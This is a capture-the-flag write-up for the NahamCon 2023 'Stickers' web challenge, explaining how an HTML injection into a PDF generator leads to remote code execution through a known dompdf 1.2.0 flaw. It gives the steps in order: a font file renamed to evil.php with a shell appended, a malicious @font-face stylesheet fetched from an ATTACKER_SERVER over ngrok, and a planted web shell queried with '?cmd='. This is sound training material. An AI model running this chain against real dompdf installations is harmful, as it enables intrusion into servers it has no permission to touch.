Tags: cve
[![Nahamcon CTF 2023: Stickers (Web)](https://img.youtube.com/vi/XHg_sBD0-es/0.jpg)](https://www.youtube.com/watch?v=XHg_sBD0-es?t=247 "Nahamcon CTF 2023: Stickers (Web)")
### Description
>Wooohoo!!! Stickers!!! Hackers love STICKERS!! You can make your own with our new website!
>Find the flag file in /flag.txt at the root of the filesystem.
## Solution
Tried various payloads in form, but there are some restrictions, e.g. email must be email format, others must be numbers. Successfully inserted `{{7 * 7}}` as the name, but it just rendered as text.
When we submit, the URL looks like: http://challenge.nahamcon.com:32110/quote.php?organisation=%7B%7B7+*+7%7D%7D&email=a%40a.com&small=1&medium=1&large=1
We get a PDF receipt, containing the information from the URL parameters.
Don't see the request in burp HTTP history, need to change the filter to include binary.
When we do that and scroll through the response, we find the version `þÿdompdf 1.2.0`.
Google it: https://github.com/positive-security/dompdf-rce
The PoC works, we just need to update URL's, MD5 hash and the payload. However, this article shows the full manual process with a more in depth explanation:
Copy a true type font to php file.
find / -name "*.ttf" 2>/dev/null
cp /path/to/example.ttf ./evil.php
Add a shell at the bottom of the file.
Create a malicious CSS, the info in here is important for accessing the uploaded PHP file, i.e. `/dompdf/lib/fonts/<font_name>_<font_weight/style>_<md5>.php`.
@font-face {
font-family: 'evil';
src: url('http://ATTACKER_SERVER/evil.php');
font-weight: 'normal';
font-style: 'normal';
Create a python web server and expose using ngrok.
sudo python -m http.server 80
ngrok http 80
Make a request containing the malicious stylesheet.
http://challenge.nahamcon.com:32110/quote.php?organisation=<link rel=stylesheet href='http://ATTACKER_SERVER/exploit.css'>&email=a%40a.com&small=1&medium=1&large=1
Calculate the MD5 of the malicious PHP URL.
echo -n http://ATTACKER_SERVER/evil.php | md5sum
Access the URL: http://challenge.nahamcon.com:32110/dompdf/lib/fonts/evil_normal_b8e6174c9d5ee52c9b35647ffbd20856.php?cmd=ls
Works! We can now call `cat /flag.txt` and receive the flag.